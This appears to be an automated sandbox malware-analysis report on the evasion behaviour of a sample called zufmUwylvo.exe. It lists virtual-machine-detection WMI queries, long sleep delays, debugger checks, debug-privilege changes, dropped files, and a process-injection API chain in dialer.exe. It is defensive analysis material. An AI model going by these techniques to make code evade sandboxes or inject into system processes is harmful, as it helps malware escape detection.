Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,

19_2_00007FF744DD10C0

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\zufmUwylvo.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_PnPEntity

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Memory allocated: 125BA9E0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Memory allocated: 125D2B20000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598485	Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Window / User API: threadDelayed 9849	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9818	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9895
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 9728
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9739
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9745
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9697
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9676
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 752
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9247
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1872
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 8127
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 3069
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 6928
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe	Window / User API: threadDelayed 2960
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe	Window / User API: threadDelayed 7039
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 4536
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 5459
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 5025
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 4973
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9105
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 879
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9902
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 7295
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 2704
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe	Window / User API: threadDelayed 8001
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe	Window / User API: threadDelayed 1998
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe	Window / User API: threadDelayed 9363
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe	Window / User API: threadDelayed 636
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9007
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 987
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 9370
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 620

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Windows\Temp\jscseoeoqftm.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	Dropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_27-14053
Source: C:\Windows\System32\dwm.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_29-21201
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_28-14025
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_24-28008

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_19-445

Source: C:\Windows\System32\winlogon.exe	API coverage: 7.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.5 %

Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe TID: 8764	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep count: 9818 > 30	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 8468	Thread sleep count: 115 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8628	Thread sleep count: 9895 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8756	Thread sleep count: 270 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8756	Thread sleep time: -270000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 8756	Thread sleep count: 9728 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8756	Thread sleep time: -9728000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 8780	Thread sleep count: 224 > 30
Source: C:\Windows\System32\lsass.exe TID: 8780	Thread sleep time: -224000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 8780	Thread sleep count: 9739 > 30
Source: C:\Windows\System32\lsass.exe TID: 8780	Thread sleep time: -9739000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8792	Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 8792	Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8792	Thread sleep count: 9745 > 30
Source: C:\Windows\System32\svchost.exe TID: 8792	Thread sleep time: -9745000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 8384	Thread sleep count: 194 > 30
Source: C:\Windows\System32\dwm.exe TID: 8384	Thread sleep time: -194000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 8384	Thread sleep count: 9697 > 30
Source: C:\Windows\System32\dwm.exe TID: 8384	Thread sleep time: -9697000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8280	Thread sleep count: 254 > 30
Source: C:\Windows\System32\svchost.exe TID: 8280	Thread sleep time: -254000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8280	Thread sleep count: 9676 > 30
Source: C:\Windows\System32\svchost.exe TID: 8280	Thread sleep time: -9676000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8440	Thread sleep count: 752 > 30
Source: C:\Windows\System32\svchost.exe TID: 8440	Thread sleep time: -752000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8440	Thread sleep count: 9247 > 30
Source: C:\Windows\System32\svchost.exe TID: 8440	Thread sleep time: -9247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1756	Thread sleep count: 1872 > 30
Source: C:\Windows\System32\svchost.exe TID: 1756	Thread sleep time: -1872000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1756	Thread sleep count: 8127 > 30
Source: C:\Windows\System32\svchost.exe TID: 1756	Thread sleep time: -8127000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8904	Thread sleep count: 3069 > 30
Source: C:\Windows\System32\svchost.exe TID: 8904	Thread sleep time: -3069000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8904	Thread sleep count: 6928 > 30
Source: C:\Windows\System32\svchost.exe TID: 8904	Thread sleep time: -6928000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 9060	Thread sleep count: 2960 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 9060	Thread sleep time: -2960000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 9060	Thread sleep count: 7039 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 9060	Thread sleep time: -7039000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8956	Thread sleep count: 4536 > 30
Source: C:\Windows\System32\svchost.exe TID: 8956	Thread sleep time: -4536000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8956	Thread sleep count: 5459 > 30
Source: C:\Windows\System32\svchost.exe TID: 8956	Thread sleep time: -5459000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 9016	Thread sleep count: 5025 > 30
Source: C:\Windows\System32\svchost.exe TID: 9016	Thread sleep time: -5025000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 9016	Thread sleep count: 4973 > 30
Source: C:\Windows\System32\svchost.exe TID: 9016	Thread sleep time: -4973000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 9128	Thread sleep count: 9105 > 30
Source: C:\Windows\System32\svchost.exe TID: 9128	Thread sleep time: -9105000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 9128	Thread sleep count: 879 > 30
Source: C:\Windows\System32\svchost.exe TID: 9128	Thread sleep time: -879000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9088	Thread sleep count: 9902 > 30
Source: C:\Windows\System32\svchost.exe TID: 8996	Thread sleep count: 7295 > 30
Source: C:\Windows\System32\svchost.exe TID: 8996	Thread sleep time: -7295000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8996	Thread sleep count: 2704 > 30
Source: C:\Windows\System32\svchost.exe TID: 8996	Thread sleep time: -2704000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 9076	Thread sleep count: 8001 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 9076	Thread sleep time: -8001000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 9076	Thread sleep count: 1998 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 9076	Thread sleep time: -1998000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 8964	Thread sleep count: 9363 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 8964	Thread sleep time: -9363000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 8964	Thread sleep count: 636 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 8964	Thread sleep time: -636000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4808	Thread sleep count: 9007 > 30
Source: C:\Windows\System32\svchost.exe TID: 4808	Thread sleep time: -9007000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4808	Thread sleep count: 987 > 30
Source: C:\Windows\System32\svchost.exe TID: 4808	Thread sleep time: -987000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6584	Thread sleep count: 9370 > 30
Source: C:\Windows\System32\svchost.exe TID: 6584	Thread sleep time: -9370000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6584	Thread sleep count: 620 > 30
Source: C:\Windows\System32\svchost.exe TID: 6584	Thread sleep time: -620000s >= -30000s

Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\zufmUwylvo.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D401BE3C FindFirstFileExW,	0_2_00000125D401BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88ABE3C FindFirstFileExW,	24_2_000001F6C88ABE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C890BE3C FindFirstFileExW,	24_2_000001F6C890BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC90BE3C FindFirstFileExW,	27_2_00000261AC90BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000001F02761BE3C FindFirstFileExW,	28_2_000001F02761BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 29_2_000002311E40BE3C FindFirstFileExW,	29_2_000002311E40BE3C

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Thread delayed: delay time: 598485	Jump to behavior

Source: zufmUwylvo.exe, 00000000.00000000.11491158875.00000125B8DC2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: XFOWUPCyHNrsvMcI
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: zufmUwylvo.exe, 00000000.00000000.11491158875.00000125B8DC2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: eNjOMSCRTKjHGfsZ
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: zufmUwylvo.exe, 00000000.00000002.11841521050.00000125B8FFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAEBD000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BABB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure DriverSystemEnableMicrosoft Hyper-V Virtualization Infrastructure Driver

Source: C:\Windows\System32\dialer.exe

API call chain: ExitProcess graph end node

graph_19-490

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Code function: 0_2_00000125D401B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00000125D401B50C

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Code function: 0_2_00000125D40130B4 GetProcessHeap,RtlAllocateHeap,NtQuerySystemInformation,StrCmpNIW,GetProcessHeap,HeapFree,RtlFreeHeap,

0_2_00000125D40130B4

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files\Google\Chrome\updater.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D401B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00000125D401B50C
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D4023218 SetUnhandledExceptionFilter,	0_2_00000125D4023218
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00000125D4017E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00000125D4017E70
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001F6C88AB50C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88B3218 SetUnhandledExceptionFilter,	24_2_000001F6C88B3218
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C88A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001F6C88A7E70
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C890B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001F6C890B50C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C8913218 SetUnhandledExceptionFilter,	24_2_000001F6C8913218
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001F6C8907E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001F6C8907E70
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC907E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00000261AC907E70
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC90B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00000261AC90B50C
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_00000261AC913218 SetUnhandledExceptionFilter,	27_2_00000261AC913218
